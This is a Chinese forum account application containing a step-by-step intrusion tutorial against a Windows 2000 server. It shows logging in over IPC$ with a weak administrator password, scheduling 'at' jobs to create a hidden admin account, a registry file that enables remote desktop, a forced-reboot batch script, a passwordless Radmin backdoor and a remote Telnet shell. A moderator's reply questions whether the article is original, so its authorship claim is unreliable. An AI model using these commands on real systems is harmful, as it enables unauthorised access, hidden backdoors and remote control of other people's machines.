申请ID：YangYu

1、申请ID：YangYu
2、个人邮箱：yangyu13777@126.com
3、原创技术文章：
我从事的是程序方面的工作，但对破解方面不是很了解，想向各位高手学习一下，特申请账号。IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。 咱们说的IPC$，其中的“$”符号带有隐藏的含义，一般存在IPC$漏洞的主机都开放着139或者是445端口。本文章主要讲解的是纯手工式基于DOS命令下进行的一个**。

测试环境：Windows Advanced server 2000服务器 （虚拟机测试）
工具：CMD

1.咱们先来看下我们的测试环境为Windows Advanced server 2000服务器 ，其中我们在虚拟机中测试我们的IPC$**。

2.通过X-Scan扫描器，我们扫描出我们的Win2000系统的弱口令为123456 ，如下图是我们的扫描结果~

3.此时我们将对192.168.1.125进行一个ipc$连接。直接在本机CMD下执行net use \\192.168.1.125 123456 /user:administrator   此时我们再通过net use 进行查看建立的连接，状态为OK状态，表示咱们的连接成功。

4.此时我们先去服务器上执行创建用户以及提权的命令，我们先用net time .\\192.168.1.125 执行查看对方的服务器时间，通过此命令查看了了对方的时间为10：49，此时我们最好使用的是24小时制。我们用at添加一项计划任务。添加我们的创建用户执行的命令。输入“at \\192.168.1.125 22:53 net user unis$ unis /add” 。

4.此时我们查看对方的作业以及时间是否已经执行了我们之前的作业。使用net time \\192.168.1.125执行查看对方的时间，输入“at \\192.168.1.125查看刚才的作业是否已经完成，如果列表为空表示刚才我们添加的作业已经完成”

5.此时我们应该将该账户从user提权到我们的Administrators组里，我们先判断对方的时间，再进行一个时间制的作业添加，最后查看作业的状态。提升管理权的作业命令“at \\192.168.1.125 net localgroup administrators unis$ /add ” 最后执行at .\\192.168.1.125发现作业的存在，此时我们等待作业的执行。

6.此时我们通过命令去开启对方的终端服务，因为对方的是2000服务器，我们使用导入注册表的方式进行开启，我们创建一个remote.reg的文件，其中的内容是咱们2000服务器开启终端后的一个注册表值的状态，内容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]  
"Enabled"="0"  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]  
"ShutdownWithoutLogon"="0"  
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]  
"EnableAdminTSRemote"=dword:00000001  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]  
"TSEnabled"=dword:00000001  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]  
"Start"=dword:00000002  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]  
"Start"=dword:00000002  
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]  
"Hotkey"="1"  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]  
"PortNumber"=dword:00000D3D  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]  
"PortNumber"=dword:00000D3D
7.此时我们要做的是复制到对方的一个共享目录下，然后通过命令进行一个导入注册表那么终端就开了。我们使用copy命令将此终端注册表文件拷贝到对方的C$下，为了便于Copy，我就先把remote.reg放入到本地C盘，（C盘路径下）键入命令：“copy remote.reg \\192.168.1.125\c$” ，当提示复制成功的时候，说明对方的默认共享C$ 已经拷贝成功，此时我们先判断对方时间为23:09分，我们添加一项将remote.reg导入注册表的作业，命令：“at \\192.168.1.125 23:11 regedit /s c:\remote.reg”

8.由于对方的主机为2000高级服务器版的系统，如果你**的非2000可以直接登录终端。开启终端后必须执行重启后才能进行连接，此时我们执行一条批处理进行一个强制重启对方的，该批处理针对设备强行重启，我们制作一个批处理为restart.bat。代码如下：
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
9.此时我们用另一种将对方盘符映射到本地磁盘的方法，将该批处理拷贝到对方的磁盘中，进行一个批处理的执行，键入映射对方盘符命令“net use X:  \\192.168.1.125 \c$” （该命令表示把对方的C默认共享盘映射到本地的X盘中。）提示“命令成功后”我们查看我的电脑看到一个X的网络驱动器，就是我们映射的，打开可以看到远程计算机C盘的文件。

10.映射成功的磁盘，我们可以对里面的文件进行增删的操作，此时我们将我们制作好的强行重启的restart.bat批处理放入到映射的C$里面。最后执行一项作业，该作业就是执行C$下的restart.bat。我们还是线判断对方时间为23：23 。我们输入命令“at \\192.168.1.125 23"26 c:\restart.bat” 表示在23：26时间远程主机执行restart.bat批处理、

11.我们等待到23：26分，此时任务不存在，远程主机也执行重启，由于我们在虚拟机进行测试，这里就给大家看下虚拟机的结果吧。由于远程主机已经关机了，此时我们建立的连接已经完全断开了，我们使用net use查看ipc$的状态

12.此时我们先将断开的连接删除，包括c$的连接，删除X的映射的命令为“net use X: /del ” 将对方的IPC$也一起删除，执行命令“net use \\192.168.1.125 /ipc$ /del”

13.此时我们通过mstsc登录192.168.1.125的终端进行尝试登录，发现能登录我们执行我们刚才创建的用户和账户进行登录，此时我们就已经**到这台高级服务器版2000的服务器。这种方式纯属我们手工通过DOS执行一些命令进行**的。

三、Radmin远控的提权法

1.我们还是先建立我们的IPC$连接，因为我们已经得到了管理员的账号和密码。键入命令："net use \\192.168.1.125 123456 /user:administrator 。

2.建立之后我们直接copy咱们Radmin远控服务端的两个文件，分别为r_server+Admdll.dll文件，直接输入命令"copy r_server.exe \\192.168.1.125\c$"和copy Admdll.dll \\192.168.1.125\c$“。复制成功后，我们先判断主机的时间，判断后，在后一分钟执行一条点击r_server.exe的命令作业，我们键入“at \\192.168.1.125 00:28 c:\r_server.exe(前面的00:27的时候时间正巧跳到了00:27我们的作业被判断到明日了。)

3.此时我们不需要启动r_server服务，直接打开我们的radmin客户端进行连接，发现能够连接，此时我们就可以控制远程服务器了~默认端口为4899，无需密码进行连接。

三、通过OpenTelnet 开服务器的Telnet获得cmshell权限
测试环境：Advanced Server 2000
工具：opentelnet.exe
1.如果我们不通过IPC$**，只得到对方的管理员弱口令和知道对方已经开启了ipc$，只要通过ipc$的通过，我们就可以通过opentelnet.exe打开对方的Telnet，所谓的telnet就是我们所说的远程主机的cmdshell，当我们拿下cmdshell的时候，我们就可以执行很多命令了。我们先看下opentelnet的参数。

2.上面的格式为：telnet \\ server  username  password NTLMAuthor telnetport 。其中NTLM值默认是2，如果我们输入2，即使开启了远程的telnet也无法执行命令，因此我们应该输入值“0” 。 此时呢 我们不需要与远程主机进行建立ipc$，直接有了管理员权限的用户名和对方开启ipc$即可进行一个Telnet的远程强制开启。
我们输入命令：opentelnet .\\192.168.1.125 unis$ unis 0 99  表示用99端口进行连接telnet。

我们已经成功了，此时我们可以使用命令“ telnet 192.168.1.125 99" 进入远程主机的 telnet执行cmd命令

Hmily

这文章搜索一下好像很多地方都有，而且是好多年前的，是你原创的吗？